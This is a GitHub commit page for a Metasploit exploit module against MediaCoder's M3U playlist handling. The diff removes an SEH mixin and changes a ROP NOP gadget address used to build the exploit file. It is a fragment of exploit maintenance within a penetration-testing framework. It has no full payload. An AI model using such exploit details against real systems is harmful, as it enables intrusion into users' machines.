Skip to content

Commit ecb2667

Browse files
committed
remove seh mixin and fix the rop nop address
1 parent 23d2bfc commit ecb2667

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

modules/exploits/windows/fileformat/mediacoder_m3u.rb

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
1111
Rank = NormalRanking
1212

1313
include Msf::Exploit::FILEFORMAT
14-
include Msf::Exploit::Seh
1514

1615
def initialize(info = {})
1716
super(update_info(info,
@@ -73,7 +72,7 @@ def junk(n=1)
7372
end
7473

7574
def nops(rop=false, n=1)
76-
return rop ? [0x6ab21799] * n : [0x90909090] * n
75+
return rop ? [0x6ab16202] * n : [0x90909090] * n
7776
end
7877

7978
def exploit

0 commit comments

Comments
 (0)